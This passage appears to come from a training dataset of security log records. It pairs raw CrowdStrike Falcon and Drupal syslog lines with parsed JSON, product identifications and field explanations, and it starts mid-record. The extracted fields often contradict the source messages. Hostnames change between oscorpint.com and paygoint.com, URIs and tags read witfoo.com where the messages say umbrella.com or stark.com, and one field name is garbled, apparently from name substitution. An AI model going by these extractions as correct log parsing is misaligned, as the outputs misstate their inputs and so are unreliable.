","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: 19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf filename: reg.exe filepath: \Device\HarddiskVolume1\Windows\System32\reg.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-09T17:22:37Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 156.27.51.231 userName: fish
Explain this syslog message
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2
{ "action": "block", "facilitycode": 16, "facilitylabel": "local0", "localhostname": "shareholders", "localstarttime": "Aug 31 10:43:49", "message": "<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2", "messagetype": "management_message", "priority": 132, "program": "drupal", "senderhost": "10.1.16.76", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "1693478629", "tags": [ "rfc3164", "block", "https://shareholders.witfoo.com", "access denied", "management_message", "drupal", "node/2" ], "uri": "https://shareholders.witfoo.com/", "vendorcode": "0", "streamName": "drupal", "clientIP": "65.47.142.125" }
Create a JSON artifact from the message
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2
Product: drupal Vendor: drupal
Identify this syslog message
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.umbrella.com|1693478629|access denied|65.47.142.125|https://shareholders.umbrella.com/||0||node/2
This is a syslog message from a product called drupal by drupal. The following fields were extracted from the message: action: block facilitycode: 16 facilitylabel: local0 localhostname: shareholders localstarttime: Aug 31 10:43:49 messagetype: management_message priority: 132 program: drupal senderhost: 10.1.16.76 sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 1693478629 tags: ['rfc3164', 'block', 'https://shareholders.witfoo.com', 'access denied', 'management_message', 'drupal', 'node/2'] uri: https://shareholders.witfoo.com/ vendorcode: 0 streamName: drupal clientIP: 65.47.142.125
Explain this syslog message
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2
{ "action": "block", "facilitycode": 16, "facilitylabel": "local0", "localhostname": "shareholders", "localstarttime": "Aug 31 10:43:49", "message": "<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2", "messagetype": "management_message", "priority": 132, "program": "drupal", "senderhost": "10.1.16.76", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "1693478629", "tags": [ "rfc3164", "block", "https://shareholders.witfoo.com", "access denied", "management_message", "drupal", "node/2" ], "uri": "https://shareholders.witfoo.com/", "vendorcode": "0", "streamName": "drupal", "clientIP": "22.133.118.103" }
Create a JSON artifact from the message
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2
Product: drupal Vendor: drupal
Identify this syslog message
<132>Aug 31 10:43:49 shareholders drupal: https://shareholders.stark.com|1693478629|access denied|22.133.118.103|https://shareholders.stark.com/||0||node/2
This is a syslog message from a product called drupal by drupal. The following fields were extracted from the message: action: block facilitycode: 16 facilitylabel: local0 localhostname: shareholders localstarttime: Aug 31 10:43:49 messagetype: management_message priority: 132 program: drupal senderhost: 10.1.16.76 sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 1693478629 tags: ['rfc3164', 'block', 'https://shareholders.witfoo.com', 'access denied', 'management_message', 'drupal', 'node/2'] uri: https://shareholders.witfoo.com/ vendorcode: 0 streamName: drupal clientIP: 22.133.118.103
Explain this syslog message